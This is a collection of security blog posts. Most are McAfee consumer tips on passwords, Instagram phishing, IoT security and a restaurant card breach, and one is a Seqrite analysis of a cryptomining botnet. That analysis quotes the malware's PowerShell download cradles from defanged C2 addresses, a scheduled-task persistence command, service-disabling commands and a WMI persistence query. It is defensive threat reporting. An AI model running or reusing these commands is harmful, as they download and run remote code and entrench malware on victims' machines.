Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime
Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids that when shopping on their favorite retail or gaming sites, not to save credit card information. Saving personal information to different accounts may speed up the checkout process. However, it also compromises data.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.

strong password

Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if you are hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication ). MFA confirms a user’s identity only after presenting two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Of course, sharing with parents, is recommended).

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

From the last one year, Quick Heal Security Labs has been observing a boost in the number of mining malware. One of the ways to earn cryptocurrencies is to mine them. Nowadays cryptocurrency miner malware have become hot attack vectors for cybercriminals due to its ease of deployment and instant return on investments. We usually observe that such miners come with different techniques to deliver it to a victim. Attacker can download original open source software and slightly modify them rather than completely writing their own module.

In this blog post, we would talk about couple of cases where attack scenario is built on top of these open source tools. We would also talk about how the trend of abusing open source tools for building new malware is helping malware authors.

The trend is observed especially in cryptojacking cases. Though cryptojacking is a direct source of income for cybercriminals, stolen information from the victim’s systems can yield additional money for cybercriminals. So, these open source tools are used for various purposes like downloading frameworks, information stealing, crypto-mining, DNS Changer, Mirai bot and many more. This helped a lot to form a botnet of similar hosts to produce more hashes per second. Often such open source tools are easily available on Github and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealer, privilege elevators, evaders, etc.


Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may come to your system through spam mails, malicious URLs, free software bundler or any conventional method that is being used by all the malware variants. Also, we suspect that a powershell script seems to be the initial culprit. The behavior of the miner is a bit recursive in nature so we could not confirm its initial trace in the system.


Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named as ‘xpdown.dat’ which contains some IP addresses of C2 servers from where it downloads further components.

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from the domains:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

It contains the IP which downloads the CPU Miner (174.128.248.10)

hxxp://45.58.135.106/kill.txt

It contains the following list of process to kill if it was running on victim machine.

lsmose.exe                            lsmos.exe                         conime.exe                            lsmosee.exe
1.exe                                      lsazs.exe                           tasksche.exe                          Zationa.exe
csrs.exe                                 shennong.bat                  svshpst.exe                            Spoolvs.exe
svchsot.exe                           xmrig.exe                        srvany.exe                              WinSCV.exe
csrswz.exe                            csrs.exe                              seser.exe                                severxxs.exe
mssecsvc.exe                       mssecsvr.exe                    dsbws.exe


Then malware downloads a text file which contains the information of multiple payloads to be downloaded.

hxxp://45.58.135.106/down.txt

And this down.txt contains the following links. The malware then opens a TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe              (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar                         (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe                            (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll                 (C:\windows\debug\item.dat)

Looking at the links in the file we observed following things.

Downs.exe is a modified version of Microsoft “CACLS” (Which displays and modifies the access control list). Ups.rar is downloaded as cab.exe. This component is a downloader for windows variant of Mirai botnet. This also acts as a DNS Changer and opens a backdoor in the system. On execution, it performs multiple operations like modifying the DNS entry in the host with IP “223.5.5.5” which has the Geo location in China and ISP of DNS is “Hangzhou Alibaba Advertising Co.,Ltd.”

 

Fig. 2 Window Server Check

 

Then it checks whether the compromised machine is a window server or not by calling GetVersionExA. It downloads update.txt from C2 server, if the machine is server, and drops at “C:\windows\system\uplist.txt”. The uplist.txt contains the following payload to be downloaded and executed.

hxxp://66.117.6.174/wpd.jpg                     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These are files used for network packets processing loaded by msinfo.exe during its execution.

Let’s look into these components one by one.

my1.bat:

It contains the code which is very stealthy and evasive as it uses several techniques such as “Squiblydoo”, “download cradle” and WMI Event Subscription persistence exploit to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://173.208.139.170/s.txt’)

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://74.222.1.38/up.txt’)

“Up.txt” contains the code which collects information regarding System OS, Physical Memory, List of running processes using WMI classes and then downloads Powershell format of Mimikatz from Github.

Further it steals the credentials from the compromised machine and uploads it to the FTP server IP:192.187.111.66 with hard coded credential of FTP.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

 It is basically a windows version of Mirai botnet. As more of its code matches with Mirai source code which was leaked previously. Upon execution with command line parameters “-create” “-run”, it checks the architecture of the current system whether it is x86, MIPS, ARM etc. Based on the identification, it will check for its latest update and download if available.

It performs the following task as per an encrypted file downloaded from C2 server.

  1. Implements spreader mechanism by performing in the form of blind SQLi (sql injection), brute force techniques by using crack library and hydra tool.
              [Cracker:Telnet][Cracker:MSSQL] [Cracker:CCTV][Cracker:MS17010], CrackerWMI, CrackerSSH
  1. It scans various ports such as 80,8000,445 using masscan (a very fastport scanner an open source project) which operates similar to nmap , the popular port scanning tool.
              https://github.com/robertdavidgraham/masscan
  1. Disable specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
              start= disabled&sc stop NlaSvc&sc config     NlaSvc start=disabled
  1. It also performs network scan for which it collects the Public/Private IP of the system and all the  associated information such as Geo Location etc. Then attacker spoofs his own IP against the current system IP and using masscan it performs scanning of other devices.

By these steps it converts this system into a bot and adds to their bot network. Its code has been developed in C++ and distributed across many sources like-

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp WPD.cpp

It basically targets IoT devices which contain embedded Linux. So it has used BusyBox (a software suite that provides UNIX utilities also called as Swiss Army Knife of embedded Linux) for executing remote commands after compromising/cracking those devices through various ways mentioned above.


VBS/BAT Agent For Download Miner:

First the payload will be dropped and executed on the below location in the victim machine.

hxxp://213.183.60.7/b.exe                      ( downloaded at C:\windows\inf\msief.exe)

On execution, it will drop the VBS and batch file in the below mentioned location and execute the vbs file by invoking wscript.exe which eventually execute the bat file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The bat file contains a lot of code, which will modify attributes of some folder/files, kill some specific processes, delete some files, modifies the access control of some folder/files, make persistent for multiple payload in the system via registry, task scheduler, WMI Event subscription and also modifies the firewall policy by blocking 445,139 ports.

 

Fig. 4 Part of C3.bat code

There are also two more additional payloads which are downloaded from one of C2 server present in xpdown.dat; one is a diskwritter, a DLL file , dropped at “C:\Windows\debug” location. It will execute on system start as it has an entry in task scheduler added by the above bat file.

schtasks /create /tn “Mysa1” /tr “rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa” /ru “system”  /sc onstart /F

And the second one is the final payload i.e. XMRig Monero Miner, a 64 bit executable downloaded from hxxp://174.128.248.10/64.rar at “C:\windows\debug\lsmos.exe”

On execution, it unpacks itself and drops 3 files on the current execution folder, one is an executable (lsmose.exe -64 bit packed with VM Protect) file and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll), which helps miner for successful execution.

One more similar case we have observed, a base64 encoded PowerShell script which is basically a cryptomining malware hiding in WMI class to evade AV and most of the security product due to its stealthy and unique feature.

After decoding we get the following code:

Fig. 5 Base64 Decoded script

 

Following is basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

On execution, it checks whether IP/Domain is alive or not mentioned in the code. If it is available, it requests for banner and receive a response as ‘SCM Event1 Log

Fig. 7 Request for “banner” and another PowerShell Payload

After that malware queries for ‘FilterToConsumerBinding’ WMI Class by executing the below command

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether it contains ‘SCM Event1 Log’. If not present, then it downloads and executes in6.ps1 (64 bit) or in3.ps1 (32 bit) by Invoking Expression(IEX).

 

Fig. 8 Request for powershell script

in6.ps1/in3.ps1:

These scripts consist of two parts, first part is a base64 encoded Gzip data stream and second part contains obfuscated code. After de-obfuscation, the code reassembles similar to initial base64 encoded script with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU Miner
  3. ‘funs’ – Collection of functions having function to execute remote DLL via WMI and eternal blue vulnerable scanning.
  4. ‘sc’ – Shellcode to execute on another systems and to download same payload, if it is vulnerable to eternal blue.

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets the filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”

When attacker uses WMI as a persistence mechanism, instances of __EventFilter,_EventConsumer and __FilterToConsumerBinding have to be created and an _InstanceCreationEvent event is fired.

In this case, attacker uses following query as the EventFilter and binds it with the initial base64 encoded script, which will eventually get executed approximately in every 3 hrs.

SELECT * FROM __InsanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig 11 Initial PS script hidden in WMI Class

It has tried to delete the task scheduler entry “sysupdater0” also checks “sysupdater0.bat” in %systemroot% , if exists remove that as well.

Modifies Windows sleep, hibernate and power plan setting by invoking the following command:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes all WMI Object in __FilterToConsumerBinding class under Namespace “root\subscription” if filter name has not matched with “SCM Event0 Log”

Then it kills the process if it has an “ESTABLISHED” connection with port number 3333, 5555 or 7777.

It makes a list of PIDs of running “Powershell” processes and the network connections of the system. It then checks for the process with “ESTABLISHED” connection and associated port number 80 or 14444 or 14433 or 443. If no such processes exist and the count of running PowerShell processes are less than 8 then it executes the Monero Miner using “funs” module. After that it executes the mimikatz and dumps the credential irrespective of execution of Monero Miner.

It also enumerates the network addresses and checks for the IPs that are active and adds them to the property named, ‘ipsu’. It then scans those IPs to identify the systems which are vulnerable to MS17-010 (with Eternal Blue Scanner Script), stores them to the property ‘i17’ and finally executes shell code which will download the ze3.ps1 or ze6.ps1 exactly similar to in3.ps1 or in6.ps1 based on OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

Shell code downloads and executes the PS Script to infect other vulnerable systems. This way it spreads and mines the other systems on the networks.

So in both the cases, the open source tools are abused heavily to perform the attack. Mimikatz, masscan, eternal blue vulnerability scanner seems to be popular tools among the malware authors. Similar techniques are being used for spreading the ransomware too. Seqrite successfully detects such attacks at various detection levels.


Indicator of Compromise:

790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD
46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044
AE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A
0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9
EAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E
30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56
7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537
EA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408
88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3
789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196
9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE
D256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936

 

Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

While many of us were focused on the European Union’s GDPR and California’s Consumer Privacy Act (CCPA), the giant on the other side of the world implemented China’s Cybersecurity Law (CSL) in June 2017. While CSL laid out broad data protection principles, there were noticeable gaps related to implementation and overall scope. To operationalize and further clarify CSL scope, the Chinese government instituted six systems: the Internet Information Content Management System; the Cybersecurity Multi-Level Protection System (MLPS); the Critical Information Infrastructure Security Protection System; the Network Products and Services Management System; the Cybersecurity Incident Management System; and the Personal Information … Continue reading The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

The post The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations appeared first on TrustArc Blog.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.
Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in a [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s –– Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were less than one billion IoT devices in use around the world. In the year 2019, that number has been projected to skyrocket to over eight billion throughout the course of this year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. With these devices creating more access points throughout our smart homes, it is comparable to leaving a backdoor unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first a picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, that will continue to grow to not only fit evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints comes more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs appear secure, but under the surface have security flaws that could facilitate home network exposures by bad actors in the future. Whereas some IoT devices were actually used to conduct botnet attacks, like an IoT thermometer and home Wi-Fi routers.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in advanced internet router that has built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at their keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and impacts devices ranging from the iPhone 5s and later, the iPad Air, and even products running tvOS. These software patches cover a variety of bugs that cybercriminals could use to obtain effects like denial-of-service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in Webkit, the browser engine Apple uses in many of its products including Safari, Mail, and App Store. Among these vulnerabilities were memory corruption bugs, which could lead to arbitrary code execution. This type of attack allows malicious actors to run any command on the target system, potentially taking over the victim’s files or allowing them to take over the victim’s system remotely. To prevent arbitrary code execution attacks, Apple improved device memory handling, state, and management. These processes control and coordinate device computer memory in order to optimize overall system performance. Another issue patched by this update is the ability for a cybercriminal to bypass sandbox restrictions, which protect a device’s critical infrastructure from suspicious code. To combat this, Apple issued an improvement to validation checks.

